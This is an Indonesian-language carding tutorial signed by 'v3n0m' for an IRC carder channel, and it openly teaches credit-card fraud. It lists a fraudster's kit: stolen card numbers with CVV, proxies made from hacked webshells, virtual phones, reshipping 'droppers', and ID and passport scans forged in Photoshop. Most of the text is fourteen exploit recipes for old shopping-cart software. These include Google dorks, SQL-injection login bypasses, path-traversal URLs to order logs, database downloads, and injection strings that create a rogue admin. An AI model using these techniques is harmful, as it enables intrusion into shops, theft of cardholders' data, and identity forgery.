Carding

Oleh : v3n0m

carding, old bugs but works

Carding…carding…carding, sebener’a males banget buat bikin tutorial ini, tapi yach terpaksa gw bikin tutorial ini karena gw udah capek di tanyain gimana sey cara carding? bro ajarin carding dunkz ?! om cara dapetin cc valid tuch gimana ?? dan bahkan ada yg tanpa malu² langsung ngomong, nyet !! pesen laptop or aircraft dunk satu, kirim ke alamat gw yak, gileee benerrrr klo ngomong seenak jidat !! dan yg bikin gw paling bete klo mereka nanyaaAaaaAaaa molo yg semua jawaban’a tuch udah jelas² ada di google, padahal google lebih mengerti daripada gw

Ngomong sey emang gampang, tapi praktek’a itu butuh kesabaran, harus pinter ngomong, fasih berbahasa inggris dan untuk lo tau bahwa carding itu untung²an, jadi ngapain juga klo gw dapet barang bagus gw kasih ke lo, mendingan buat gw aja

pasti lo² semua yg sering nanya ke gw mo tau kan apa aja yg gw persiapkan sebelom melakukan carding, well… tanpa ada sedikitpun yg gw tutup²in terkecuali bagian bawah dari tubuh gw, sekarang gw kasih tau:


1. Credit Card number + cvv + expired (harus valid)
2. Proxy USA klo bisa
3. Virtual Phone Number (skype)
4. Virtual Address (klo di butuhkan)
5. Email khusus carding (yahoomail,gmail,hotmail,etc)
6. Seller
7. Dropper (biar barang lo cepet nyampe’a)
8. Roko Mild satu bungkus
9. Snack Potato Rasa Barbeque 5 Bungkus
10. Music Player (winamp,jet audio,amarok)

okay !! gw yakin lo pada nanya gimana cara dapetin proxy? nah di sini balik lagi dey lo sama yg nama’a webshell yg lo dapetin dari web yg mempunyai bug Remote File Inclusion, di sana lo bisa bikin proxy sendiri, tapi klo lo emang orang’a “MALES” mendingan lo balik lagi ke paman google, lo bisa cari situs² penyedia proxy gratis, tapi yaa gitu dey, ga awet, paling lama juga 1 jam udah mati.

Kedua tentang virtual phone number, tau skype kan ? itu loch yg buat voip (voice over internet protocol) nah lo bisa beli nomer telephone virtual dari USA melewati skype, trus fungsi’a buat apa ?? gw males jelasin’a mendingan lo join aja di chan #yogyacarderlink dan tanya² sama anak² yg ada di sana okay !!

Ketiga tentang virtual address, di sini lo beli alamat virtual di USA dan ada lembaga di sana yg ngurus barang² lo buat di kirim ke alamat asli lo, cuma proses pembelian’a agak susah, lo harus nunjukin credit card, license drive, ID card, visa, paspor, bingung gimana cara’a ? buat apa ada photoshop klo ga di gunain, hahahah, lagian dia kan cuma minta gambar hasil scan, jadi cari aja gambar²a di google trus edit dey di photoshop.

Keempat Email khusus, satu hal penting, jangan pernah ngirim orderan ke email lo yg biasa lo pake buat ngirim² pesan penting, jangan pernah lo campur aduk tu email, klo bisa lo bikin lagi email baru yg khusus buat carding, dan biasain pake logika lo, klo mo carding, nama email’a yg berhubungan dengan nama² orang USA sana, minimal lo dapet 1 point kecil penting lah untuk nama email ini.

Kelima lo harus punya seller or penjual yg kira² bisa shipping worldwide, silakan cari sendiri shop online di google yg bisa shipping worldwide dengan imajinasi kata² lo sendiri.

Keenam about Dropper, nah ini di butuhin klo emang kita dapet shop online yg ga nerima shipping worldwide, inti’a lo harus punya kenalan or koneksi di USA atau di Canada bahkan mungkin England yg bisa di ajak kerjasama, jadi begitu barang di kirim ke dropper, dia langsung ngirim ke alamat kita, jadi seandai’a lo beli laptop, jangan beli satu, tapi minimal dua, biar satu buat kita, satu buat dia, itu nama’a kerjasama kan ?? dan di situlah kerjaan dropper, mereka cuma ngedrop barang kita doank dan mereka dapet untung juga dari kita

and The Last, how to find valid credit card, here’s old bug but works

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem :D CShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20'a%25'–
Gantilah nilai dari string url terakhir dg:
%20'a%25'–
%20'b%25'–
%20'c%25'–
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1' where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template…

13. contoh bugs pada bentuk toko sistem :P roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem :D igishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

well, menurut gw ini udah cukup menjelaskan bagaimana langkah² untuk melakukan carding, dan klo masih ada yg mo di tanyain lagi, silakan join aja di #yogycarderlink@Dal.net, cuz i dont wanna you ask to me on private messege again about carding !!

#yogyacarderlink@Dal.net cRew